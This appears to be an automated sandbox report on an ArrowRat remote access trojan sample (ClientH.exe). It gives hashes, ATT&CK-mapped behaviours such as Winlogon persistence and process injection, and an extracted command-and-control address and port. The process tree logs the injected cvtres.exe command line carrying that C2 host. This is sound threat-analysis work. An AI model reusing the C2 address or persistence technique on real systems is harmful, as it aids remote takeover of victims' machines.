arrowrat | 213452a323be1617cfa62abeae43d873bec1e5c740aa2177e157a9772a92f231

Analysis

max time kernel
148s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
06-08-2023 06:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ClientH.exe
Size

90KB
MD5

5558467d200c00a5acab51d4a9ca98dd
SHA1

f9d50c3556451b056deb0950b6bdd4c3ecbb570f
SHA256

213452a323be1617cfa62abeae43d873bec1e5c740aa2177e157a9772a92f231
SHA512

80167cbf7301726ef6a1fd8f2c91db4076f5f5c869338953b1dacc88bf7f82e7caadabbbf32ecda3327c1be4c9da2477a198123a9ac1acf114f03c64bada3921
SSDEEP

1536:ebRiQMhQ57SK3bUzZdQ1iIMvnZlbLxjV3AGq5gWlocT1wzySsd9NJ33p:ebRF57SKsstcnZTJQDgWPaySsdH5Z

Score

10^/10

arrowrat venomhvnc persistence rat

Malware Config

Extracted

Family

arrowrat

Botnet

VenomHVNC

185.183.35.122:4448

Mutex

GHAEYKXuf.exe

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

ClientH.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Users\\Admin\\AppData\\Roaming\\PRtaDfZk\\PRtaDfZk"	ClientH.exe

Modifies Installed Components in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

explorer.exe

description	ioc	Process
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

ClientH.exe

description	pid	Process	procid_target
PID 3064 set thread context of 544	3064	ClientH.exe	84

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3800	3508	WerFault.exe	89
4240	1108	WerFault.exe	98
2472	2320	WerFault.exe	102
2028	2184	WerFault.exe	107
2904	388	WerFault.exe	110

Modifies Internet Explorer settings 1 TTPs 10 IoCs

adware spyware

Modify Registry

T1112

Processes:

SearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\SOFTWARE\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Software\Microsoft\Internet Explorer\GPU	SearchApp.exe

Modifies registry class 64 IoCs

Processes:

explorer.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133328609344693795"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56"	SearchApp.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23"	SearchApp.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

ClientH.exe

pid	Process
3064	ClientH.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

ClientH.exeexplorer.exe

description	pid	Process
Token: SeDebugPrivilege	3064	ClientH.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe
Token: SeShutdownPrivilege	3244	explorer.exe
Token: SeCreatePagefilePrivilege	3244	explorer.exe

Suspicious use of FindShellTrayWindow 49 IoCs

Processes:

explorer.exe

pid	Process
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe

Suspicious use of SendNotifyMessage 21 IoCs

Processes:

explorer.exe

pid	Process
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe
3244	explorer.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

StartMenuExperienceHost.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exeSearchApp.exe

pid	Process
3416	StartMenuExperienceHost.exe
3508	SearchApp.exe
1108	SearchApp.exe
2320	SearchApp.exe
2184	SearchApp.exe
388	SearchApp.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

ClientH.exe

description	pid	Process	procid_target
PID 3064 wrote to memory of 3244	3064	ClientH.exe	83
PID 3064 wrote to memory of 3244	3064	ClientH.exe	83
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84
PID 3064 wrote to memory of 544	3064	ClientH.exe	84

C:\Users\Admin\AppData\Local\Temp\ClientH.exe
"C:\Users\Admin\AppData\Local\Temp\ClientH.exe"
1⤵
- Modifies WinLogon for persistence
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3064
- C:\Windows\explorer.exe
  "C:\Windows\explorer.exe"
  2⤵
  - Modifies Installed Components in the registry
  - Enumerates connected drives
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3244
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" VenomHVNC 185.183.35.122 4448 GHAEYKXuf.exe
  2⤵
  PID:544

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:3416

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3508
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3508 -s 3944
  2⤵
  - Program crash
  PID:3800

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3508 -ip 3508
1⤵
PID:4020

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1108
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 1108 -s 3584
  2⤵
  - Program crash
  PID:4240

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 516 -p 1108 -ip 1108
1⤵
PID:2720

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2320
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2320 -s 3928
  2⤵
  - Program crash
  PID:2472

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 184 -p 2320 -ip 2320
1⤵
PID:3576

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2184
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 2184 -s 3592
  2⤵
  - Program crash
  PID:2028

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 520 -p 2184 -ip 2184
1⤵
PID:4240

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:388
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 388 -s 3536
  2⤵
  - Program crash
  PID:2904

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 388 -ip 388
1⤵
PID:1260

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
